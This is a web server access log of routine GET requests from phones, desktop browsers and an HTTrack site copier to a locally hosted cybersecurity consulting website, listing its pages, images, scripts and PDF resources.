192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81378 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:06 -0500] "GET /products.html HTTP/1.1" 200 7157 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26427 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38061 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /bcp.html HTTP/1.1" 200 6651 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /uploads/2/9/1/4/29147191/601239_orig.png HTTP/1.1" 200 111181 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /uploads/2/9/1/4/29147191/4304070_orig.png HTTP/1.1" 200 57269 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Coffee.html HTTP/1.1" 200 5011 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:05 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] "GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1" 200 120188 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5012 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /contact.html HTTP/1.1" 200 6976 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/contact.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1" 200 5011 "http://192.168.0.35/contact.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81378 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45953 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:34 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1" 200 765195 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /backblue.gif HTTP/1.1" 304 182 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /fade.gif HTTP/1.1" 304 181 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /products.html HTTP/1.1" 200 7157 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38061 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26427 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5012 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /risk.html HTTP/1.1" 200 6606 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1" 200 55344 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1" 200 5012 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1" 200 174914 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:05 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1" 200 265419 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5012 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:16 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_encryption.pdf HTTP/1.1" 200 1045139 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /incident.html HTTP/1.1" 200 6621 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /uploads/2/9/1/4/29147191/4174185_orig.png HTTP/1.1" 200 99002 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /uploads/2/9/1/4/29147191/1888827_orig.png HTTP/1.1" 200 59026 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working.html HTTP/1.1" 200 5011 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.36 - - [12/Nov/2017:18:35:47 -0500] "GET /robots.txt HTTP/1.1" 404 503 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:48 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:49 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:50 -0500] "GET /fade.gif HTTP/1.1" 200 1112 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:51 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:52 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:53 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:54 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42819 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:55 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47030 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:58 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7836 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:01 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26428 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38062 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
